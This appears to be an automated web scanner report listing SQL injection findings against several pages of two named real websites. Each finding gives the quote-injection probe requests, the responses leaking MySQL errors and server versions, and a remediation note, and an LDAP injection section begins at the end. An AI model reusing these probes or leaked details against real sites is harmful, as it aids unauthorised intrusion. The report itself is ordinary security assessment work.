GET /news/mishaps-a-rescues/index.php?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/index.php?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.114. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/sailing
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/sailing?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/sailing?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.115. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/todays-top-stories
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/todays-top-stories?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/todays-top-stories?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.116. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/resources
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /resources?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /resources?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.117. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/site-map
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /site-map?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /site-map?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.118. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/subscription-services
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /subscription-services?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /subscription-services?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:25 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.119. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/subscription-services/preview-current-issue
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.120. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/subscription-services/subscribe-to-e-newsletter
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /parsley HTTP/1.1 Host: www.spicefactory.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1 (redirected)
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:15:50 GMT Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29 X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/html Content-Length: 6866
script: <BR> number of MySQL function calls: 3<BR> SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243','h ...[SNIP]... <BR> MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0)' at line 1<BR> ...[SNIP]...
Request 2
GET /parsley HTTP/1.1 Host: www.spicefactory.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2 (redirected)
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:16:22 GMT Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29 X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/html Content-Length: 6330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta content="Spicefactory offers open source software for bu ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /parsley HTTP/1.1 Host: www.spicefactory.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:15:49 GMT Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29 X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/html Content-Length: 6831
script: <BR> number of MySQL function calls: 3<BR> SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243','' ...[SNIP]... <BR> MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'',0)' at line 1<BR> ...[SNIP]...
Request 2
GET /parsley HTTP/1.1 Host: www.spicefactory.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2 (redirected)
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:15:49 GMT Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29 X-Powered-By: PHP/5.2.17 Connection: close Content-Type: text/html Content-Length: 6330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta content="Spicefactory offers open source software for bu ...[SNIP]...
2. LDAP injectionpreviousnext There are 2 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
